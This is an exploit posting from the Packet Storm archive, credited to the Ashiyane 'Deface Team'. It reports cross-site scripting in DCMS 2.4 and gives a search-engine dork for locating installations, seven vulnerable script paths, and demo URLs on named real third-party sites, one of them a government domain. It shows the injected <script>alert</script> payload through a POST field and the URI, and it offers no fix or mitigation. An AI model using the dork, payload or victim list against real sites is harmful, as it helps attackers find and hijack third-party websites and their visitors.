DCMS 2.4 Cross Site Scripting

2013-03-31T00:00:00
ID PACKETSTORM:121026
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-03-31T00:00:00

Description

                                        
                                            `++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Exploit Title: DCMS v2.4 Cms Cross Site Scripting vulnerability #  
#  
[+] Exploit Author: Ashiyane Digital Security Team #  
#  
[+] Home : www.Ashiyane.org #  
#  
[+] Vendor Homepage: www.dibagroup.com #  
#  
[+] Category: Web Application #  
#  
[+] Version: 2.4  
#  
[+] Tested on: Windows 7 #  
#  
[+] Dork: intext:"Powered By DCMS 2.4" #  
#  
-----------------------------------------------------------  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
-----------------------------------------------------------  
+ Location:site/DCMS/statistic/tpro2/demographics.php[Xss]  
#  
+ Location:site/DCMS/statistic/tpro2/navigation.php[Xss]  
#  
+ Location:site/DCMS/statistic/tpro2/search.php[Xss]  
#  
+ Location:site/DCMS/statistic/tpro2/summary.php[Xss]  
#  
+ Location:site/DCMS/statistic/tpro2/technology.php[Xss]  
#  
+ Location:site/DCMS/statistic/tpro2/traffic.php[Xss]  
#  
+ Location:site/Search.php[Xss]  
#  
#  
+ DEm0:http://www.khcu.gov.ir/Search.php[Xss]  
  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/demographics.php[Xss]  
#  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/navigation.php[Xss]  
#  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/search.php[Xss]  
#  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/summary.php[Xss]  
#  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/technology.php[Xss]  
#  
+ DEm0:http://www.khcu.gov.ir/DCMS/statistic/tpro2/traffic.php[Xss]  
+ DEm0:http://www.yazdtelecom.ir/Search.php[Xss]  
  
++++++++++++++++++++++++++++++++++  
[+] EXploit:  
[-]Target/Search.php ==> POST (multipart) input s was set to <script>alert(/XSS/);</script>  
  
[-]Target/DCMS/ ==> URI was set to <script>alert(/XSS/);</script>  
======================================  
* Greetz to: My Lord Allah   
* Sp Tnx To:  
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in,B4b4K KH4TaR,sil3nt and all  
Ashiyane Security [ Researcher Team AND Deface Team ]  
  
* The Last One : My Self, tr0janman  
*******  
--------------------------------------------  
  
  
  
`